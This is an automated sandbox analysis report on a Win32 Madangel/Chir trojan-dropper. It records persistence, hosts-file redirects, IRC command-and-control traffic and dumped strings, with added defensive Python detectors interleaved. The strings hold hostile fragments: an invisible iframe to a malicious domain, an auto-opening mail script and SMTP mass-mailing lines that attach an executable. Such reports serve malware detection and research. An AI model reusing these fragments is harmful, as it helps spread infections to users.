Win32.Madangel.DIA_c9c282fda9
Win32.Madangel.DIA (BitDefender), Virus:Win32/Madang.A (Microsoft), Trojan-Dropper.Win32.Injector.pbuu (Kaspersky), Virus.Win32.Madang.a (v) (VIPRE), Win32.Virut.56 (DrWeb), Win32.Madangel.DIA (B) (Emsisoft), W32/Chir.gen!remnants (McAfee), W32.Madangel (Symantec), Virus.Win32.Sality (Ikarus), Win32.Madangel.DIA (FSecure), Win32:Madangel (AVG), Win32:Madangel (Avast), Win32.Madangel.DIA (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Virus
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: c9c282fda9cf61c630757001e7ef4964
SHA1: 070dc4501ad98feabd284d3c638b52daf13a17ea
SHA256: d8d7e1eafe5b754152af719d789977d898e753d2c71e0e11c9ea2bd29be377f2
SSDeep: 6144:5dGvgKIR08uBlCfVOAIpl 4vcHz9ek6Rz6oSDWIWAWq3yItL:n9KtL fVNID3Ueko6oSlNW6
Size: 237296 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2011-04-28 11:25:13
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan-Dropper: a Trojan program intended for the stealth installation of other malware on the user's system.
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:3404
The Trojan injects its code into the following process(es):
DrvUpdater.exe:812
%original file name%.exe:2604
%original file name%.exe:3380
Explorer.EXE:1440
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process DrvUpdater.exe:812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DrvUpdater.xml (113 bytes)
The process %original file name%.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\Serverx.exe (1504988 bytes)
The process %original file name%.exe:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DrvUpdater.Run.bat (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe (1281 bytes)
The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\runouce.exe (1504988 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (2360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (2904 bytes)
Registry activity
The process DrvUpdater.exe:812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\DRPSu Updater]
"Publisher" = "DriverPack Solution"
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe"
"DisplayVersion" = "0.0.25"
"DisplayName" = "DriverPack Solution Updater"
"HelpLink" = "http://drp.su/"
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe /uninstall"
"NoModify" = "1"
"Version" = "0.0.25"
"InstallDate" = "20170707"
"InstallLocation" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu"
"NoRepair" = "1"
To run automatically each time Windows starts, the Trojan adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DrvUpdater" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe"
The process %original file name%.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To run automatically each time Windows starts, the Trojan adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Serverx" = "C:\Windows\system32\Serverx.exe"
The process %original file name%.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To run automatically each time Windows starts, the Trojan adds the following reference to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Runonce" = "C:\Windows\system32\runouce.exe"
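A scan over Run-key values of the kind listed above, added here as an example; it is not part of the Lavasoft report. SAMPLE_RUN_VALUES is constructed from the three values the report records (user name replaced by "alice") plus two benign entries assumed for contrast. The "one edit away" rule catches runouce.exe against the real runonce.exe name; setupx.exe and updatex.exe are taken from the sample's strings, and the list of legitimate look-alike targets is a general one, not something the report lists.

```python
"""Flag suspicious Run-key values of the kind this report records.

Added example, not part of the Lavasoft report. It works over a constructed
list of (hive, value name, command line) tuples so that it runs offline;
the same tuples can be read from a live Windows host with winreg.
"""
import ntpath
import re

# Constructed input: the three Run values the report lists (user name
# replaced by "alice") plus two benign entries added for contrast.
SAMPLE_RUN_VALUES = [
    ("HKCU", "DrvUpdater", r"C:\Users\alice\AppData\Roaming\DRPSu\DrvUpdater.exe"),
    ("HKCU", "Serverx", r"C:\Windows\system32\Serverx.exe"),
    ("HKLM", "Runonce", r"C:\Windows\system32\runouce.exe"),
    ("HKLM", "SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
    ("HKCU", "OneDrive", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]

# Drop names tied to this sample: the two files it writes to System32 and
# the other two names present in its strings.
KNOWN_BAD_BASENAMES = {"serverx.exe", "runouce.exe", "setupx.exe", "updatex.exe"}

# Legitimate Windows binaries whose names malware approximates (general list);
# runouce.exe is one character away from the real runonce.exe.
LOOKALIKE_TARGETS = {"runonce.exe", "svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe"}


def executable_name(command: str) -> str:
    """Lower-cased file name of the program a Run value launches."""
    command = command.strip()
    if command.startswith('"'):
        exe = command[1:].split('"', 1)[0]
    else:
        # Unquoted form: take everything up to the first ".exe".
        m = re.match(r"(.*?\.exe)", command, re.IGNORECASE)
        exe = m.group(1) if m else (command.split()[0] if command else "")
    return ntpath.basename(exe).lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; inputs are short file names, so O(len*len) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_run_value(hive: str, name: str, command: str) -> list:
    """Reasons this Run value looks suspicious; empty list when it looks benign."""
    reasons = []
    exe = executable_name(command)
    if exe in KNOWN_BAD_BASENAMES:
        reasons.append(f"{exe} is a drop name from the Madangel/Chir sample")
    for legit in sorted(LOOKALIKE_TARGETS):
        if exe != legit and edit_distance(exe, legit) == 1:
            reasons.append(f"{exe} is one edit away from {legit}")
    # A per-user Run value that launches a file in System32 is odd: software
    # installed machine-wide registers its autorun under HKLM.
    if hive == "HKCU" and "\\system32\\" in command.lower():
        reasons.append("HKCU Run value launches an executable in System32")
    return reasons


def scan_run_values(entries) -> dict:
    """Map (hive, value name) -> reasons for every flagged entry."""
    findings = {}
    for hive, name, command in entries:
        reasons = assess_run_value(hive, name, command)
        if reasons:
            findings[(hive, name)] = reasons
    return findings


if __name__ == "__main__":
    for key, reasons in scan_run_values(SAMPLE_RUN_VALUES).items():
        print(key, *reasons, sep="\n    ")
```

On a live Windows host the tuples come from winreg.OpenKey on Software\Microsoft\Windows\CurrentVersion\Run under HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE, iterated with winreg.EnumValue. Note that these rules do not flag the DrvUpdater value: the uninstall entries, version info and update URL on this page all belong to the DriverPack Solution updater, and the vendor names (Virus:Win32/Madang.A, W32.Madangel, W32/Chir) classify the threat as a file infector, so that value is the carrier application's own persistence rather than something the infector adds.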
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which maps host names to IP addresses and is consulted before DNS.
The modified file is 864 bytes in size. The following entries are added to the hosts file:
127.0.0.1 ZieF.pl
127.0.0.1 validation.sls.microsoft.com
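A check for hosts-file entries like the two above, added here as an example; it is not part of the Lavasoft report. HOSTS_SAMPLE is a constructed file body (the stock Windows header comments followed by the two added lines). That validation.sls.microsoft.com is Microsoft's Windows licensing validation endpoint, and that ZieF.pl is the domain of the IRC server seen in the Traffic section, are stated from general knowledge and from the rest of this page, not from the hosts section itself; the Microsoft-name rule at the end is a general heuristic that goes beyond what this sample does.

```python
"""Find hosts-file entries that black-hole names the way this sample does.

Added example, not part of the Lavasoft report. HOSTS_SAMPLE is a constructed
file body: the stock Windows header comments followed by the two lines the
sandbox saw added.
"""

HOSTS_SAMPLE = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
#   127.0.0.1       localhost
#   ::1             localhost
127.0.0.1 ZieF.pl
127.0.0.1 validation.sls.microsoft.com
"""

LOOPBACK_AND_NULL = {"127.0.0.1", "0.0.0.0", "::1"}
# Names that legitimately resolve to loopback.
BENIGN_LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}
# The two names the report shows being redirected. validation.sls.microsoft.com
# is Microsoft's Windows licensing validation endpoint (general knowledge, not
# stated in the report); zief.pl hosts the IRC server seen in the traffic.
KNOWN_SINKHOLED = {"zief.pl", "validation.sls.microsoft.com"}


def parse_hosts(text: str):
    """Yield (ip, hostname, line number) for every mapping the resolver would use."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments, including trailing ones
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            yield ip, name.lower(), line_no


def suspicious_hosts_entries(text: str) -> list:
    """(line number, ip, hostname, reason) for each entry worth a look."""
    findings = []
    for ip, name, line_no in parse_hosts(text):
        if name in BENIGN_LOCAL_NAMES:
            continue
        if name in KNOWN_SINKHOLED:
            findings.append((line_no, ip, name, "name this sample is known to redirect"))
        elif ip in LOOPBACK_AND_NULL:
            findings.append((line_no, ip, name, "external name mapped to loopback/null address"))
        elif name.endswith((".microsoft.com", ".windowsupdate.com")):
            # General heuristic beyond this sample: any override of a Microsoft
            # update/validation name is suspect whatever address it points to.
            findings.append((line_no, ip, name, "Microsoft service name overridden"))
    return findings


if __name__ == "__main__":
    for line_no, ip, name, why in suspicious_hosts_entries(HOSTS_SAMPLE):
        print(f"line {line_no}: {ip} {name}  <- {why}")
```

The parser strips trailing comments before splitting, so an attacker appending "# localhost" to a redirect line does not hide it, and all names on a line are checked, not just the first.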
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile
Propagation
VersionInfo
Company Name:
Product Name: DRP Su Updater
Product Version: 0, 0, 25, 0
Legal Copyright: DriverPack Solution
Legal Trademarks:
Original Filename: DrvUpdater.exe
Internal Name: DRP Su Updater
File Version: 0, 0, 25, 0
File Description: DRP Su Updater
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 253952 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 258048 | 163840 | 161792 | 5.54268 | f3f5b45947f34ffa3dac18b582129744 |
.rsrc | 421888 | 74480 | 74480 | 4.8823 | f232b663f872dcedba2ec222fd80bc79 |
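Section-table triage of the kind the table above invites, added here as an example; it is not part of the report or of any Lavasoft tooling. The PE image is constructed in memory from the three section names, virtual addresses and virtual sizes in the table; the raw data is scaled down (4096 pseudo-random bytes for UPX1, 512 bytes of repeated text for .rsrc) so the script runs offline, and the optional header is a zero-filled stub, so the image parses but would not load. PACKER_SECTION_NAMES is a general list, not something the report provides.

```python
"""Section-table triage for a packed PE of the kind this report describes.

Added example, not from the Lavasoft report. It builds a tiny constructed
PE image in memory (so it runs offline) whose section table mirrors the
report's: an empty UPX0 with a large virtual size, a UPX1 carrying the
compressed body, and .rsrc. Only the section table is parsed; the optional
header is a zero-filled stub and the image is not loadable.
"""
import hashlib
import math
import struct

# Section names left behind by common packers (general list, assumption).
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".petite",
                        "MPRESS1", "MPRESS2", ".vmp0", ".vmp1"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for empty input, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes) -> list:
    """Return [(name, virtual_address, virtual_size, raw_size, raw_data)]."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(n_sections):
        name, vsize, vaddr, rsize, rptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        name = name.rstrip(b"\0").decode("latin-1")
        sections.append((name, vaddr, vsize, rsize, image[rptr:rptr + rsize]))
    return sections


def triage(image: bytes) -> list:
    """Human-readable findings: packer names, unpack targets, high-entropy bodies."""
    findings = []
    for name, vaddr, vsize, rsize, data in parse_sections(image):
        if name in PACKER_SECTION_NAMES:
            findings.append(f"{name}: packer section name")
        if rsize == 0 and vsize > 0:
            # Nothing on disk, but memory reserved: where the stub unpacks to.
            findings.append(f"{name}: no raw data but {vsize} bytes reserved in memory (unpack target)")
        ent = shannon_entropy(data)
        if ent > 7.0:
            findings.append(f"{name}: entropy {ent:.2f} (compressed or encrypted)")
    return findings


def _pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) for the constructed UPX1 body."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_constructed_image() -> bytes:
    """Three-section PE skeleton; names, RVAs and virtual sizes follow the report's table."""
    upx1 = _pseudo_random(4096)                    # stands in for 161792 packed bytes
    rsrc = (b"DRP Su Updater\0" * 40)[:512]        # low-entropy stand-in for resources
    headers = bytearray(512)
    headers[:2] = b"MZ"
    struct.pack_into("<I", headers, 0x3C, 64)      # e_lfanew
    headers[64:68] = b"PE\0\0"
    # COFF header: i386, 3 sections, no symbols, 224-byte optional header, EXE+32-bit.
    struct.pack_into("<HHIIIHH", headers, 68, 0x014C, 3, 0, 0, 0, 224, 0x0102)
    struct.pack_into("<H", headers, 88, 0x10B)     # PE32 magic; rest of optional header left zero
    table = 88 + 224
    layout = [(b"UPX0", 253952, 4096, 0, 0),
              (b"UPX1", 163840, 258048, len(upx1), 512),
              (b".rsrc", 74480, 421888, len(rsrc), 512 + len(upx1))]
    for i, (name, vsize, vaddr, rsize, rptr) in enumerate(layout):
        struct.pack_into("<8sIIII", headers, table + 40 * i, name, vsize, vaddr, rsize, rptr)
    return bytes(headers) + upx1 + rsrc


if __name__ == "__main__":
    for line in triage(build_constructed_image()):
        print(line)
```

Against a real file, read it with open(path, "rb") and pass the bytes to triage; the same three signals (packer section name, a zero-raw-size section with a large virtual size, and an entropy above 7 bits per byte) are what the "Entropy: Packed" verdict above summarises.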
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
hxxp://update.drp.su/drpupdater/DrvUpdater.xml | |
irc.zief.pl | |
teredo.ipv6.microsoft.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN IRC Nick change on non-standard port
ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
Traffic
NICK ovjvjlai.USER i020601 . . :#10f5f7edb Service Pack 1.JOIN #.364.
:irc 001 ovjvjlai :Hi virtu.:irc 376 ovjvjlai :End of /MOTD command.:i
rc 001 ovjvjlai :Hi virtu.:irc 376 ovjvjlai :End of /MOTD command..:ov
jvjlai JOIN #.364..:ovjvjlai JOIN #.364.
GET /drpupdater/DrvUpdater.xml HTTP/1.1
Host: update.drp.su
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 07 Jul 2017 02:43:30 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 113
Last-Modified: Fri, 03 Feb 2017 10:10:01 GMT
Connection: close
ETag: "589456f9-71"
GeoIP: UA
Accept-Ranges: bytes
<root>
<version value='0.0.25'>
 <file path='hXXp://dev2.drp.su/download/DrvUpdater.exe' />
</version>
</root>
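A decoder for the IRC registration burst at the top of the Traffic section, added here as an example; it is not part of the Lavasoft report. The sandbox prints CR, LF and other non-printable bytes as dots, so the two byte strings below are a constructed reconstruction of the capture with CR LF restored; the channel name is kept exactly as rendered ("#.364") and may hide a byte the report did not preserve. The destination port is not in the report and is passed in as a parameter; the real-name regex is derived from the format string "%.6x . . :%c%.8x%x %s" found in the sample's strings, and what its hex fields encode is not stated on this page.

```python
"""Decode the IRC registration burst captured in the Traffic section and pull
out the bot's identifiers.

Added example, not part of the Lavasoft report. The sandbox prints CR, LF and
other non-printable bytes as '.', so the two byte strings below are a
constructed reconstruction of the capture with CR LF restored; the channel
name is kept as rendered ("#.364"). The destination port is not in the report
and is a parameter.
"""
import re

CLIENT_BURST = (
    b"NICK ovjvjlai\r\n"
    b"USER i020601 . . :#10f5f7edb Service Pack 1\r\n"
    b"JOIN #.364\r\n"
)
SERVER_BURST = (
    b":irc 001 ovjvjlai :Hi virtu.\r\n"
    b":irc 376 ovjvjlai :End of /MOTD command.\r\n"
    b":ovjvjlai JOIN #.364\r\n"
)

# Ports on which IRC is expected (assumption); anything else is the condition
# the "ET TROJAN IRC Nick change on non-standard port" alert keys on.
IRC_STANDARD_PORTS = {6660, 6661, 6662, 6663, 6664, 6665, 6666, 6667, 6668, 6669, 6697, 7000}

# Shape of the USER real-name field, derived from the format string
# "%.6x . . :%c%.8x%x %s" in the sample's strings: one marker character,
# an 8-digit hex value, a short hex value, a space, then free text (here the
# Windows service-pack string). What the hex values encode is not in the
# report; they are simply extracted as identifiers.
REALNAME_RE = re.compile(r"^(?P<marker>.)(?P<id8>[0-9a-f]{8})(?P<flag>[0-9a-f]+) (?P<os>.+)$")


def parse_irc_lines(payload: bytes) -> list:
    """Split a raw IRC stream into (prefix, command, params, trailing) tuples."""
    lines = []
    for raw in payload.split(b"\r\n"):
        if not raw:
            continue
        line = raw.decode("latin-1")
        prefix = None
        if line.startswith(":"):
            prefix, _, line = line[1:].partition(" ")
        body, sep, trailing = line.partition(" :")
        parts = body.split()
        if not parts:
            continue
        lines.append((prefix, parts[0].upper(), parts[1:], trailing if sep else None))
    return lines


def profile_client_burst(payload: bytes, dst_port: int):
    """Describe a bot registration, or return None when the stream is not IRC."""
    lines = parse_irc_lines(payload)
    seen = {cmd for _, cmd, _, _ in lines}
    if not {"NICK", "USER"} <= seen:
        return None
    info = {"non_standard_port": dst_port not in IRC_STANDARD_PORTS}
    for _, cmd, params, trailing in lines:
        if cmd == "NICK" and params:
            info["nick"] = params[0]
            # The capture and the strings ("NICK kqclujuk") show short random
            # lower-case nicks; record whether this one fits that shape.
            info["nick_is_random_alpha"] = bool(re.fullmatch(r"[a-z]{6,10}", params[0]))
        elif cmd == "USER" and params:
            info["user"] = params[0]
            m = REALNAME_RE.match(trailing or "")
            if m:
                info.update(host_id=m["id8"], flag=m["flag"], os_string=m["os"])
        elif cmd == "JOIN" and params:
            info["channel"] = params[0]
    return info


def summarize_server_burst(payload: bytes) -> dict:
    """Welcome banner and confirmed channel joins from the server side."""
    summary = {"welcome": None, "joined": []}
    for prefix, cmd, params, trailing in parse_irc_lines(payload):
        if cmd == "001":
            summary["welcome"] = trailing
        elif cmd == "JOIN" and prefix:
            summary["joined"].append(params[0] if params else trailing)
    return summary


if __name__ == "__main__":
    print(profile_client_burst(CLIENT_BURST, dst_port=8080))
    print(summarize_server_burst(SERVER_BURST))
```

The three fields worth pivoting on in a hunt are the service-pack string the bot volunteers in USER (it fingerprints the victim OS), the channel it joins, and the server's "Hi virtu." welcome banner, which is server configuration rather than anything the client sends.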
The Trojan connects to the servers at the following location(s):
Strings from dumps:
.rsrc
m.Hv!
%f)EE
.kL{,w
2.whe'
4A.jq
uRlj
.lh2gxg
h%F?27
SG3s^6;".AFj1
2{"J~X .Fe|
1%0xO
*%U]R
D~.wE
.XIz*
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegOpenKeyA
ShellExecuteA
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
1094721
hXXps://secure.comodo.net/CPS0A
0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
hXXp://ocsp.comodoca.com0
info@drp.su0
hXXp://drp.su/0
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
C7%D(
[L\-j}
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
0, 0, 25, 0
DrvUpdater.exe
%original file name%.exe_2604_rwx_0046D000_00001000:
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegOpenKeyA
ShellExecuteA
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
%original file name%.exe_2604_rwx_00478000_00002000:
KERNEL32.dll
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
.idata
.reloc
%original file name%.exe_3380:
.rsrc
m.Hv!
%f)EE
.kL{,w
2.whe'
4A.jq
uRlj
.lh2gxg
h%F?27
SG3s^6;".AFj1
2{"J~X .Fe|
1%0xO
*%U]R
D~.wE
.XIz*
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegOpenKeyA
ShellExecuteA
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
1094721
hXXps://secure.comodo.net/CPS0A
0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
hXXp://ocsp.comodoca.com0
info@drp.su0
hXXp://drp.su/0
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoyirc.zief.pl
proxim.ircgalaxy.pl
NICK kqclujuk
SFC.DLL
SFC_OS.DLL
SHLWAPI.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 ZieF.pl
#<iframe src="hXXp://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
0, 0, 25, 0
DrvUpdater.exe
DrvUpdater.exe_812:
`.rsrc
T$XRSShL$D
t%h(%D
DVPQRhh%D
E<h}%D
{4h}%D
O@It_ItSIt.It
D$<}%D
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
dhu2.iu
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
portuguese-brazilian
.jpeg
.html
0123456789
X;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
/DrvUpdater.xml
0.0.25
\DrvUpdater.Update
\DrvUpdater.Update.bat
ping -n 1 127.0.0.1
start /D "%APPDATA%\DRPSu" DrvUpdater.exe
copy /Y /B "%TEMP%\DrvUpdater.Update" "%APPDATA%\DRPSu\DrvUpdater.exe"
del /F "%TEMP%\DrvUpdater.Update"
del /F "%TEMP%\DrvUpdater.Update.bat
url.dll,FileProtocolHandler hXXp://devid.drp.su/?l=ru&down=updater&dev=
url.dll,FileProtocolHandler hXXp://devid.drp.su/?l=en&down=updater&dev=
\DrvUpdater.exe
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Uninstall\DRPSu Updater
hXXp://drp.su/
/DrvUpdater.Uninstall.bat
/DrvUpdater.Run.bat
hXXp://update.drp.su/drpupdater/DrvUpdater.xml
Rundll32.exe
WARNING: failed to save cookies in %s
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
Protocol %s not supported or disabled in libcurl
[^:]:%[^
:]://%[^
<url> malformed
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
Re-using existing connection! (#%ld) with host %s
User-Agent: %s
Connection #%ld to host %s left intact
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Failed to connect to %s: %s
%s:%d
Send failure: %s
Recv failure: %s
[%s %s %s]
operation aborted by callback
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
HTTP server doesn't seem to support byte ranges. Cannot resume.
Received problem %d in the chunky parser
